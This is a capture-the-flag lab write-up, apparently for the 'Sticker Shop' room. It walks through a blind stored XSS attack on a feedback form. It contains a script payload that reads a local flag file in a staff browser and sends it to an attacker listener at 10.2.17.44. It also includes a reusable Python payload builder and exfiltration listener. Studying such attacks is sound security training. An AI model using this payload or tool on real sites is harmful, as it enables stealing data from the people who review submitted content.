The Sticker Shop
Introduction
A local sticker shop has recently launched its own webpage. Due to limited experience in web development, they have opted to develop and host the website on the same computer they use for everyday tasks such as browsing the internet and reading customer feedback. This setup introduces significant security risks, making it a viable target for ethical security assessment.
Our goal is to determine whether we can read the flag stored at http://10.10.151.58:8080/flag.txt.
Initial Observations
Requesting http://10.10.151.58:8080/flag.txt directly returns a 401 Unauthorized response, so the file is served but withheld from anyone who is not recognised as an authenticated user. We cannot read it from our own machine; we need the request to come from someone (or something) the server does trust.
Examining the other available endpoints, we find a feedback submission page at http://10.10.151.58:8080/submit_feedback. It contains a form for submitting free-text feedback, and after submission the following message appears:
"Thanks for your feedback! It will be evaluated shortly by our staff."
This message suggests that submitted feedback is later opened by a staff member, most likely in a browser on the same machine that hosts the site. If our input is rendered without proper encoding, that is a stored cross-site scripting (XSS) attack, and because we will never see the page it executes on, a blind one.
Exploiting Blind XSS
Blind XSS is stored XSS in which the payload executes on a page the attacker cannot see, typically an internal review interface used by an administrator. Since the feedback "will be evaluated shortly by our staff", a staff member is likely to open it in a browser, and any JavaScript embedded in it would run in that browser. Because we get no direct feedback, the payload must report back to a server we control: that callback both confirms execution and carries the data we want.
Attack Strategy
Our approach involves crafting a JavaScript payload that:
- Fetches the contents of /flag.txt from the local service (http://127.0.0.1:8080) inside the staff member's browser.
- Sends the retrieved data to a server we control.
On the attacking machine (10.2.17.44), we start a listener that logs every incoming request. The standard-library module is enough, since the flag will arrive in the query string of a GET request:
python3 -m http.server 80
We then submit the following payload through the feedback form. When a staff member opens the stored feedback, the script runs in their browser on the hosting machine itself, so the request to the local service comes from a trusted position rather than from us, and passes the check that returned 401 to our direct request:
<script>
// Read the flag from the local service, as the staff member's browser (same host that serves the site).
fetch('http://127.0.0.1:8080/flag.txt')
.then(response => response.text())
.then(data => {
// Forward the body to our listener in the query string. encodeURIComponent keeps
// characters such as '&', '#' or '%' from being dropped or throwing a URIError.
// The browser still sends this cross-origin GET even though CORS prevents the page
// from reading the response, which is all the exfiltration needs.
fetch('http://10.2.17.44/?data=' + encodeURIComponent(data))
})
</script>
Once a staff member opens the feedback, the listener records the callback from the target, with the flag in the data parameter:
10.10.188.220 - - [04/Feb/2025 15:09:45] "GET /?data=THM{83789a69074f-B0end-8b62305ee6} HTTP/1.1" 200 -
Note that http.server logs the raw request line, so any percent-encoding applied by the payload appears as-is (for example { as %7B) and has to be decoded by hand.
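The two halves of the attack above (the payload that reads the flag in the victim's browser, and the listener that receives it) can be packaged so the encoding is handled correctly on both ends. The following is an added example written for this write-up, not code from the original author or the room; it assumes, as the write-up does, that the attacker box is reachable by the victim browser at http://10.2.17.44/ and that the flag is served on the target's loopback interface at http://127.0.0.1:8080/flag.txt. Its listener replaces `python3 -m http.server 80` and URL-decodes the `data` and `err` parameters instead of leaving them percent-encoded in the access log; the payload builder also reports fetch failures back, so a payload that ran but could not reach the flag is distinguishable from one the staff member never opened.

```python
#!/usr/bin/env python3
"""Blind-XSS exfiltration helper (added example, not part of the original write-up).

Assumptions, not stated by the write-up beyond the IPs it uses: the attacker
listener is reachable from the victim browser at http://10.2.17.44/ and the
flag is served to the hosting machine itself at http://127.0.0.1:8080/flag.txt.
"""
import json
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlparse

DEFAULT_TARGET = "http://127.0.0.1:8080/flag.txt"  # assumed internal URL of the flag
DEFAULT_CALLBACK = "http://10.2.17.44/"            # assumed attacker listener


def build_payload(target: str = DEFAULT_TARGET, callback: str = DEFAULT_CALLBACK) -> str:
    """Return the stored-XSS payload that reads `target` in the victim's browser
    and sends the response body back to `callback` in the `data` parameter.

    json.dumps() yields valid JavaScript string literals, so odd characters in
    the URLs cannot break out of the script.  The callback fetch is cross-origin
    and its response is blocked by CORS, but the browser still sends the request,
    which is all we need; mode 'no-cors' keeps the console free of errors.
    Failures of the internal fetch are reported via the `err` parameter.
    """
    target_js, cb_js = json.dumps(target), json.dumps(callback)
    return (
        "<script>"
        f"fetch({target_js})"
        ".then(r => r.text())"
        f".then(body => fetch({cb_js} + '?data=' + encodeURIComponent(body), {{mode: 'no-cors'}}))"
        f".catch(e => fetch({cb_js} + '?err=' + encodeURIComponent(String(e)), {{mode: 'no-cors'}}))"
        "</script>"
    )


def decode_exfil(path: str) -> Optional[dict]:
    """Parse a request path such as '/?data=THM%7B...%7D' and return
    {'kind': 'data' | 'err', 'value': <decoded text>}, or None for unrelated
    requests (favicon probes, scanners, ...).  parse_qs undoes the
    percent-encoding that encodeURIComponent applied on the victim side."""
    params = parse_qs(urlparse(path).query, keep_blank_values=True)
    for kind in ("data", "err"):
        if kind in params:
            return {"kind": kind, "value": params[kind][0]}
    return None


class ExfilHandler(BaseHTTPRequestHandler):
    """Prints decoded exfiltrated values and answers 204 so nothing is rendered."""

    received = []  # (kind, value) pairs, kept for later inspection

    def do_GET(self):
        hit = decode_exfil(self.path)
        if hit is not None:
            ExfilHandler.received.append((hit["kind"], hit["value"]))
            print(f"[+] {self.client_address[0]} {hit['kind']}: {hit['value']}", file=sys.stderr)
        self.send_response(204)
        self.end_headers()

    def log_message(self, fmt, *args):  # silence the default per-request log line
        pass


def start_listener(bind: str = "0.0.0.0", port: int = 80) -> HTTPServer:
    """Bind the listener; call .serve_forever() on the returned server."""
    return HTTPServer((bind, port), ExfilHandler)


if __name__ == "__main__":
    print("Paste this into the feedback form:\n" + build_payload(), file=sys.stderr)
    start_listener().serve_forever()
```

Run it as root (or pick a high port and adjust the callback URL), paste the printed payload into the feedback form, and the flag is printed decoded as soon as the staff member's browser executes the script. An `err` callback instead of `data` means the script ran but the internal fetch failed, for example because the staff member browses the site under a hostname other than 127.0.0.1 and the request was treated as cross-origin.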